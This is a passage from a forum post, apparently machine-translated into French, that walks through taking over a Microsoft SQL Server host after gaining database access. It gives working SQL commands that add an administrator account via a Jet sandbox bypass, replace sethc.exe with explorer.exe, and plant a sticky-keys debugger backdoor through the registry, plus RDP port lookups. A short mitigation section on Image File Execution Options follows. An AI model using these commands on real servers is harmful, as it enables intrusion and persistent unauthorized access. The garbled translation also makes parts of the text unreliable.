Ensuite, cmd exécute cscrip pour supprimer t c :\1.vbs
4. Le précédent est réparé pour exécuter des commandes cmd, mais après quelques réparations, de nouveaux problèmes apparaissent
(1) Message : Une erreur s’est produite lors de l’exécution de xp_cmdshell. Appelez 'CreateProcess' qui a échoué avec le code d’erreur : '5'.
L’erreur 5 est un numéro d’erreur demandé par le système, CreateProcess signifie créer un thread, cette génération d’erreurs est beaucoup liée à la cmd.exe des fichiers système, d’une part est que cmd est supprimé, l’autre est que la permission de cmd est réduite.
SQL pour vérifier les ports de terminal et l’état d’ouverture :
Maître exécutif... xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP', 'PortNumber'
D’accord, le point clé ci-dessous est d’utiliser deux instructions SQL pour copier le fichier explorateur du système dans le fichier de la porte dérobée shift du système, et les deux instructions suivantes sont exécutées séparément.
Cette déclaration copie explorer.exe comme sethc.exe
Déclarez @o exécutif INT sp_oacreate 'scripremove ting.filesystemobject', @o notre exécutif sp_oamethod @o, 'copyfile',null,'c :\windows\explorer.exe','c :\windows\system32\sethc.exe' ;
Cette instruction copie sethc.exe dans le répertoire dllcache
Déclare @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c :\windows\system32\sethc.exe','c :\windows\system32\dllcache\ sethc.exe' ;
Les deux autres instructions utilisent sp_oacreate procédures stockées qui doivent utiliser odsole70.dll fichier, donc la survie de ce fichier dépend du succès de sa création.
(2), xpsql.cpp : Erreur 5 de CreateProcess (ligne 737)
Cette situation est plus délicate, et c’est dit sur Internet
EXÉCUTIF master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SoftWare\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD',0
Sélectionnez * depuis OpenRowSet('Microsoft.Jet.OLEDB.4.0',' ; Database=c :\windows\system32\ias\ias.mdb','select shell(« net user 123 123 /add »)') ;
Sélectionnez * depuis OpenRowSet('Microsoft.Jet.OLEDB.4.0',' ; Database=c :\windows\system32\ias\ias.mdb','select shell(« net localgroup administrators 123 /add »)') ;
J’ai vérifié le bac à sable pour reconnaître les droits sur cette affaire, mais dans ma pratique, ce taux de réussite est très faible, car la plupart des serveurs ont supprimé c :\windows\system32\ias\ias.mdb. Ensuite, vous pouvez essayer le détournement d’image sethc, bien sûr, le détournement d’image est aussi conditionnel, 1 existe xp_regwrite cette procédure stockée 2 est 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',' Débogueur » n’est pas supprimé
Vous pouvez d’abord vous demander si la clé épinglante du registre a été détournée
Maître exécutif... xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger '
Si l’invite ne détecte pas le problème, la preuve est supprimée, il n’y a aucun moyen, si on le demande, sethc.exe exécuter la commande sql
Maître exécutif... xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Débogueur',
@type='REG_SZ',
@value='C :\WINDOWS\explorer.exe'
Après avoir connecté au terminal 5 fois et changé de position, il va directement sur le bureau, puis l’ajoute manuellement.
Le registre modifie le port terminal
[HKEY_LOCAL_MACHINE \ SYSTÈME \ CurrentControlSet \ Control \ Serveur Terminal \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,
Concernant la prévention du détournement d’images, elle est principalement réalisée par les méthodes suivantes :
★ Loi sur la restriction des permissions
Si l’utilisateur n’a plus accès à la clé du registre, il ne peut pas modifier ces éléments. Ouvrez l’éditeur de registre et allez dans HKEY_LOCAL_MACHINE\LOGICIEL\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options : sélectionnez cet élément, faites un clic droit sur les autorisations > > avancées, et baissez les permissions des administrateurs et des utilisateurs système (ici, il vous suffit d’annuler l’opération d’écriture).
★ Méthode rapide de coupe au couteau pour le chanvre salissant
Ouvre l’éditeur de registre et va au bar
HKEY_LOCAL_MACHINE\LOGICIEL\Microsoft\Windows NT\CurrentVersion\Options d’exécution du fichier image
Le problème peut être résolu en supprimant directement l’élément Options d’exécution du fichier image.
La commande SQL détourne l’installation de la porte arrière de la clé autocollante du registre
xp_regwrite 'HKEY_LOCAL_MACHINE', 'LOGICIEL\Microsoft\Windows NT\CurrentVersion\Options d’exécution du fichier image\sethc.exe',
'Déboguage','REG_SZ', 'C :\WINDOWS\system32\kdsn.exe'
Téléchargement logiciel :Touristes, si vous voulez voir le contenu caché de ce post, s’il vous plaît Répondre
|
Publié sur 18/03/2015 10:36:56
|
|
|
|
Publié sur 19/03/2015 20:26:09
|
